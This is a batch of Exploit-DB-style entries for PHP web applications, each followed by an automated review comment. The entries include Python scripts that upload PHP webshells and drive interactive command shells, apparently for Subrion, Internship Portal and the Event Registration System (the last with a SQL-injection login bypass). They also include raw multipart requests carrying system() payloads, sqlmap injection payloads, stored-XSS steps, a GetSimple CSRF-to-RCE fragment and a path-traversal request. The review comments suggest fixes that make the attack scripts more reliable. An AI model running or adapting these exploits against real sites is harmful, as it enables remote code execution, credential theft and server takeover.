about = SB+FB+' The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
parser.add_argument('Target',type=str,help=desc1)
desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
parser.add_argument('PublicPage',type=str,help=desc2)
args = parser.parse_args()
return args
if __name__ == '__main__':
header = SB+FR+' GetSimple CMS - Custom JS Plugin Exploit\n'
header += SB+FB+' CSRF '+FT+'->'+FB+' Stored XSS '+FT+'->'+FB+' XHR PHP Code Injection '+FT+'->'+FB+' RCE\n'+ST
header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke & Abhishek Joshi\n'+ST
print(header)
args = argsetup()
target = args.Target
page = args.PublicPage
print(sig())
theTHREADER()
pwnt = checkWebshell(target)
if pwnt != 200:
while pwnt != 200:
sleep(3)
tryUploadWebshell(target,page)
sleep(2)
pwnt = checkWebshell(target)
print("{} A wild webshell appears!".format(ok))
webshell(target)
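Review bot: `class S(BaseHTTPRequestHandler)` reuses the name `S` that was imported as colorama's `Style` (`from colorama import (... Style as S)`); it only works because `ST, SD, SB` were bound before the class definition, and any later `S.RESET_ALL` would fail. Rename the handler (e.g. `CsrfHandler`). Other points: the header date `30/04/201` is missing a digit; `webshell()` passes a stray second argument in `"{}/webshell.php".format(target,page)`; and the bare `except: pass` blocks in `webshell`, `tryUploadWebshell` and `checkWebshell` hide connection errors, so `checkWebshell` returns None on any failure and the main `while pwnt != 200` loop spins silently.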

exploits/php/webapps/49823.py Executable file

@ -0,0 +1,74 @@
# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
# Date: 2021-05-04
# Exploit Author: argenestel
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: Debian 10
import requests
import time
#change the url to the site running the vulnerable system
url="http://127.0.0.1:4000"
#burp proxy
proxies = {
"http": "http://127.0.0.1:8080",
}
#payload
payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
#the upload point
insert_url=url+"/inserty.php"
def fill_details():
global payload
global shellend
global shellstart
print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
#time start
shellstart=int(time.time())
#print(shellstart)
files = {'file':('shell.php',payload,
'image/png', {'Content-Disposition': 'form-data'}
)
}
data = {
"company_name":"some",
"first_name":"some",
"last_name":"some",
"email":"some@some.com",
"gender":"Male",
"insert_button":"Apply",
"terms":"on"
}
r = requests.post(insert_url, data=data, files=files)
if r.status_code == 200:
print("Exploited Intern System Successfully...")
shellend = int(time.time())
#print(shellend)
shell()
else:
print("Exploit Failed")
def shell():
for shellname in range(shellstart, shellend+1):
shellstr=str(shellname)
shell_url=url+"/upload/"+shellstr+"_shell.php"
r = requests.get(shell_url)
if r.status_code == 200:
shell_url=url+"/upload/"+shellstr+"_shell.php"
break
r = requests.get(shell_url)
if r.status_code == 200:
print("Shell Starting...")
while True:
cmd=input("cmd$ ")
r = requests.get(shell_url+"?cmd="+cmd)
print(r.text)
else:
print("File Name Error")
fill_details()
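Review bot: in `shell()` the `for` loop breaks on the first 200 response, but the following `r = requests.get(shell_url)` re-requests the same URL and, when no candidate matched, silently tests the last timestamp a second time before printing "File Name Error"; a `found` flag or a `for ... else:` would express the intent and save a request. The `proxies` dict is defined but never passed to any request, and `cmd` is concatenated unencoded into the query string (`shell_url+"?cmd="+cmd`), so the comment `#burp proxy` is misleading and the input handling is fragile.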

exploits/php/webapps/49876.py Executable file

@ -0,0 +1,120 @@
# Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
# Date: 17/05/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://subrion.org/
# Software Link: https://github.com/intelliants/subrion
# Version: SubrionCMS 4.2.1
# Tested on: Debian9, Debian 10 and Ubuntu 16.04
# CVE: CVE-2018-19422
# Exploit Requirements: BeautifulSoup library
# https://github.com/intelliants/subrion/issues/801
#!/usr/bin/python3
import requests
import time
import optparse
import random
import string
from bs4 import BeautifulSoup
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")
parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")
parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login")
options, args = parser.parse_args()
if not options.url:
print('[+] Specify an url target')
print('[+] Example usage: exploit.py -u http://target-uri/panel')
print('[+] Example help usage: exploit.py -h')
exit()
url_login = options.url
url_upload = options.url + 'uploads/read.json'
url_shell = options.url + 'uploads/'
username = options.user
password = options.passw
session = requests.Session()
def login():
global csrfToken
print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')
print('[+] Trying to connect to: ' + url_login)
try:
get_token_request = session.get(url_login)
soup = BeautifulSoup(get_token_request.text, 'html.parser')
csrfToken = soup.find('input',attrs = {'name':'__st'})['value']
print('[+] Success!')
time.sleep(1)
if csrfToken:
print(f"[+] Got CSRF token: {csrfToken}")
print("[+] Trying to log in...")
auth_url = url_login
auth_cookies = {"loader": "loaded"}
auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"}
auth_data = {"__st": csrfToken, "username": username, "password": password}
auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)
if len(auth.text) <= 7000:
print('\n[x] Login failed... Check credentials')
exit()
else:
print('[+] Login Successful!\n')
else:
print('[x] Failed to got CSRF token')
exit()
except requests.exceptions.ConnectionError as err:
print('\n[x] Failed to Connect in: '+url_login+' ')
print('[x] This host seems to be Down')
exit()
return csrfToken
def name_rnd():
global shell_name
print('[+] Generating random name for Webshell...')
shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
time.sleep(1)
print('[+] Generated webshell name: '+shell_name+'\n')
return shell_name
def shell_upload():
print('[+] Trying to Upload Webshell..')
try:
up_url = url_upload
up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"}
up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"}
up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n"
session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)
except requests.exceptions.HTTPError as conn:
print('[x] Failed to Upload Webshell in: '+url_upload+' ')
exit()
def code_exec():
try:
url_clean = url_shell.replace('/panel', '')
req = session.get(url_clean + shell_name + '.phar?cmd=id')
if req.status_code == 200:
print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')
while True:
cmd = input('$ ')
x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')
print(x.text)
else:
print('\n[x] Webshell not found... upload seems to have failed')
except:
print('\n[x] Failed to execute PHP code...')
login()
name_rnd()
shell_upload()
code_exec()
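Review bot: the shebang `#!/usr/bin/python3` is on the 11th line, after the header comments, so it is inert; move it to line 1. `shell_upload()` sends a hard-coded `INTELLI_06c8042c3d` cookie and `Origin`/`Referer` headers for `http://192.168.1.20` on top of the authenticated `session`, which may collide with the session cookie obtained by `login()` and ties the script to the author's lab host; drop the cookie dict and derive Origin/Referer from `options.url`. `url_upload` and `url_shell` also assume `--url` ends with a slash (`options.url + 'uploads/read.json'`), which the help text `http://target/panel` does not show; normalize with `options.url.rstrip('/') + '/'`. The exception names `err` and `conn` are unused, the login check `len(auth.text) <= 7000` is a brittle heuristic, and the final bare `except:` in `code_exec` swallows every error.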


@ -0,0 +1,43 @@
# Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
# Date: 2021-05-16
# Exploit Author : bwnz
# Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
# Version: 1.0
# Tested on: Ubuntu 20.04.2 LTS
# Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
# After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
# vulnerability to obtain remote code execution.
-----SQL Injection-----
Step 1.) Navigate to the login page and populate the email and password fields.
Step 2.) With Burp Suite running, send and capture the request.
Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
Step 4.) Open a terminal and run the following command:
sqlmap -r <saved item>
Below are the SQLMap results
Parameter: user_email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=
----- END -----
----- Authenticated RCE via Arbitrary File Upload -----
# For this attack, it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.
Step 1.) After logging in, click the "Initialization" option and "Add System Info".
Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
Step 3.) By default, the file is uploaded to http://<IP>/Staff_registration/media/evil.php. Navigate to it for RCE.
----- END ------
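Review bot: the header is missing the Vendor Homepage field used by the other entries in this batch, and the RCE section never states what `evil.php` contains or which form field the logo upload uses, so the result in step 3 cannot be checked from the text; add the request and the file body. The sqlmap line `sqlmap -r <saved item>` could also name the parameter (`-p user_email`) that the results below identify.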


@ -0,0 +1,26 @@
# Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)
# Date: 05022021
# Exploit Author: Avinash R
# Vendor Homepage: https://zenar.io/
# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
# Version: 8.8.52729
# Tested on: Windows 10 Pro (No OS restrictions)
# CVE : CVE-202127673
# Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38
##### Step To Reproduce #####
1) Login to the admin page of Zenario CMS with admin credentials, which is
http://server_ip/zenario/admin.php
2) Click on, New → HTML page to create a new sample page and intercept it
with your interceptor.
3) Just a single quote on the 'cID' parameter will confirm the SQL
injection.
4) After confirming that the 'cID' parameter is vulnerable to SQL
injection, feeding the request to SQLMAP will do the rest of the work for
you.
############ End ############
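Review bot: the CVE reference `CVE-202127673` is malformed (no hyphen between year and sequence number), and the date `05022021` has no separators, so day/month order is ambiguous; write both in the standard forms. The steps also never show the request that carries `cID` (path, method, where the parameter sits), which a reader needs to reproduce step 3 without the external reference.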


@ -0,0 +1,43 @@
# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp
First of all we should use file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
1) Go to content section .
2) Click Files and upload malicious php file.
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
After upload our file , our request and respons is like below :
Request:
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8
pc\mertdas
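Review bot: the header lacks the Version and Vendor Homepage fields (the version appears only in the title), and step 3 names the file `yourphp.php` while the captured request uses `cmd.php`; align these. The captured `Cookie:` line also publishes live `txp_login_public` and `PHPSESSID` values; session identifiers should be redacted in published traffic.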


@ -0,0 +1,55 @@
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# CVE : N/A
# Proof of Concept :
1- Login any user account and change profile picture.
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)
3- Before uploading your file, intercept your traffic by using any proxy.
4- Change test.php.jpg file to test.php and click forward.
5- Find your test.php file path and try any command.
###################### REQUEST ##########################################
GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/cman/members/dashboard.php
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc
####################### RESPONSE #########################################
HTTP/1.1 200 OK
Date: Sat, 03 Jul 2021 11:28:16 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
X-Powered-By: PHP/8.0.3
Content-Length: 4410
Connection: close
Content-Type: text/html; charset=UTF-8
Host Name: MRT
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19043 N/A Build 19043
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Murat
System Boot Time: 6/25/2021, 2:51:40 PM
System Manufacturer: Dell Inc.
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
############################################################################
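Review bot: steps 2 and 3 are in the wrong order: step 2 already uploads the renamed `test.php.jpg`, and step 3 then says "Before uploading your file, intercept your traffic". Reorder to rename, start the proxy, upload, then change the filename in the intercepted request (step 4). The upload path `/cman/members/uploads/` only appears in the request and belongs in step 5 as well, and the `PHPSESSID` value should be redacted.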


@ -0,0 +1,161 @@
# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
# Date: 2021-07-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10, XAMPP
###########
# PoC 1: #
###########
Request:
========
POST /osms/Execute/ExAddProduct.php HTTP/1.1
Host: localhost
Content-Length: 2160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/AddNewProduct.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0
Connection: close
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductName"
camera
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BrandName"
soskod
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductPrice"
12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Quantity"
1
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="TotalPrice"
12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="DisplaySize"
15
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="OperatingSystem"
windows
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Processor"
4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="InternalMemory"
4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="RAM"
4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="CameraDescription"
lens
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BatteryLife"
3300
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Weight"
500
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Model"
AIG34
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Dimension"
5 inch
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ASIN"
9867638
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductImage"; filename="rev.php"
Content-Type: application/octet-stream
<?php echo "result: ";system($_GET['rev']); ?>
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="date2"
2020-06-03
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Description"
accept
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="_wysihtml5_mode"
1
------WebKitFormBoundaryIBZWMUliFtu0otJ0--
###########
# PoC 2: #
###########
Request:
========
POST /osms/Execute/ExChangePicture.php HTTP/1.1
Host: localhost
Content-Length: 463
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/UserProfile.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594
Connection: close
------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="IDUser"
6
------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="Image"; filename="rev.php"
Content-Type: application/octet-stream
<?php echo "output: ";system($_GET['rev']); ?>
------WebKitFormBoundary4Dm8cGBqGNansHqI--
###########
# Access: #
###########
# Webshell access via:
PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami
PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami
# Output:
result: windows10\user
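Review bot: both requests carry a `PHPSESSID` cookie, so the PoCs appear to need a logged-in session, yet the title does not say "(Authenticated)" and nothing states whether `ExAddProduct.php` or `ExChangePicture.php` is reachable without one; make this explicit. The Output section shows `result: windows10\user`, which matches the PoC 1 shell (`echo "result: "`), while the PoC 2 shell prints `output: `; add its output or note that only PoC 1 was run.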

exploits/php/webapps/50107.py Executable file

@ -0,0 +1,11 @@
# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal
# Date: 05.07.2021
# Exploit Author: TheSmuggler
# Vendor Homepage: https://gotmls.net/
# Software Link: https://gotmls.net/downloads/
# Version: <= 4.20.72
# Tested on: Windows
import requests
print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)
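Review bot: the title says 4.20.59 while the `# Version:` line says `<= 4.20.72`; pick one. The traversal path is in a normal string literal, so `\.` and `\W` are invalid escape sequences (Python 3 emits a DeprecationWarning, a SyntaxError in future versions); use a raw string `r"..."` or forward slashes. The target is hard-coded to `127.0.0.1`; take it from `sys.argv` with a usage line like the other scripts in this batch.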


@ -0,0 +1,45 @@
# Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)
# Date: 08/07/2021
# Exploit Author: Subhadip Nag
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Server: XAMPP
# Description #
Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/ZMSP/zms/admin/index.php and Login(given User & password)
2) Goto: http://localhost/ZMSP/zms/admin/add-animals.php
3) Fill out Animal name, Breed and Description with given payload: <script>alert(1)</script>
4) Goto: http://localhost/ZMSP/zms/admin/manage-animals.php
5) Stored XSS payload is fired
6) Goto: http://localhost/ZMSP/zms/admin/manage-ticket.php
7) Edit any Action field with the following payload: <script>alert(1)</script> and Update
8) Go back and again click 'Manage Type Ticket'
9) Stored XSS payload is fired
10) Goto: http://localhost/ZMSP/zms/admin/aboutus.php
11) In the Page 'Title' & 'Description',Enter the Payload: <script>alert(1)</script> and Click Update
12) Goto: http://localhost/ZMSP/zms/admin/contactus.php
13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update
14) Logout and click 'Back Home'
15) Our XSS payload successful
# Image PoC : Reference Image #
1) https://ibb.co/g4hFQDV
2) https://ibb.co/frbpf9c
3) https://ibb.co/NtKrc9C
4) https://ibb.co/cFGWhCz
4) https://ibb.co/CMXmN4f
5) https://ibb.co/C0dV0PC
6) https://ibb.co/4ZW8tb3
7) https://ibb.co/3zgFq9b
8) https://ibb.co/wS8wXj8
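Review bot: the description line is missing its operative words: `vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data` should read "because of insufficient sanitization of user-supplied data". Two smaller consistency points: the reference image list numbers two entries `4)`, and step 8 says click 'Manage Type Ticket' while step 6 points at `manage-ticket.php`; use the same page name in both.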

@ -0,0 +1,15 @@
# Exploit Title: WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)
# Date: 14/07/2021
# Exploit Author: Vikas Srivastava
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/current-book/
# Version: 1.0.1
# Category: Web Application
How to Reproduce this Vulnerability:
1. Install WordPress 5.7.2
2. Install and activate Custom Book
3. Navigate to Tools >> Current Book and enter the XSS payload into the Book and Author input field.
4. Click Update Options
5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
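Review bot: step 2 (`Install and activate Custom Book`) names a different plugin than the title and Software Link (Current Book); one of them is a typo and should be corrected. The `# Vendor Homepage:` field is empty, and step 3 says "enter the XSS payload" without stating which payload was used, so the reproduction cannot be verified as written. Step 5 is one long run-on sentence and would read better split into "the payload is stored" and "it executes when the page is rendered".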

exploits/php/webapps/50159.py Executable file

@ -0,0 +1,107 @@
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
# Exploit Author: Javier Olmedo
# Date: 27/07/2021
# Vendor: Sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
# Affected Version: 1.0
# Category: WebApps
# Platform: PHP
# Tested on: Ubuntu Server & Windows 10 Pro
import os, re, sys, argparse, requests
from termcolor import cprint
def banner():
os.system("cls")
print('''
___________ __
\_ _____/__ __ ____ _____/ |_
| __)_\ \/ // __ \ / \ __\\
| \\\\ /\ ___/| | \ |
/_______ / \_/ \___ >___| /__|
\/ \/ \/
Registration System
--[Authentication Bypass and RCE]--
@jjavierolmedo
''')
def get_args():
parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
args = parser.parse_args()
return args
def auth_bypass(s, proxies, url):
data = {
"username":"admin'#",
"password":""
}
r = s.post(url, data=data, proxies=proxies)
if('{"status":"success"}' in r.text):
cprint("[+] Authenticacion Bypass Success!\n", "green")
return s
else:
cprint("[-] Authenticacion Bypass Error!\n", "red")
sys.exit(0)
def upload_shell(s, proxies, url):
content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"
file = {
'img':('cmd.php',content)
}
data = {
"name":"Event Registration System with QR Code - PHP",
"short_name":"ERS-QR-PHP",
}
r = s.post(url, files=file, data=data, proxies=proxies)
if('1' in r.text and r.status_code == 200):
cprint("[+] Upload Shell Success!\n", "green")
return s
else:
cprint("[-] Upload Shell Error!\n", "red")
sys.exit(0)
def get_shell_url(s, proxies, url):
r = s.get(url, proxies=proxies)
regex = '\_cmd.php"> (.*?)</a></li>'
shell_name = re.findall(regex, r.text)[0]
url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)
cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")
def main():
banner()
args = get_args()
target = args.target
proxies = {'http':'','https':''}
if args.proxy:
proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}
login_url = target + "/event/classes/Login.php?f=rlogin"
upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
shell_url = target + "/event/uploads/"
s = requests.Session()
s = auth_bypass(s, proxies, login_url)
s = upload_shell(s, proxies, upload_url)
s = get_shell_url(s, proxies, shell_url)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
cprint("[-] User aborted session\n", "red")
sys.exit(0)
# Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
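Review bot: `get_shell_url()` ignores the `-t` target and builds `url_shell` from a hardcoded `http://localhost/event/uploads/`, so the URL it reports is wrong for any other host; it also indexes `re.findall(regex, r.text)[0]` without checking that anything matched (an IndexError instead of a clear error), and it returns nothing, so the caller's `s = get_shell_url(...)` leaves `s` as None. The regex `'\_cmd.php"> ...'` contains the invalid escape `\_`. `os.system("cls")` in `banner()` only works on Windows although the header lists Ubuntu Server as a test platform, and the success check `'1' in r.text and r.status_code == 200` in `upload_shell()` is satisfied by almost any response body that contains the digit 1.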

@ -0,0 +1,9 @@
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4
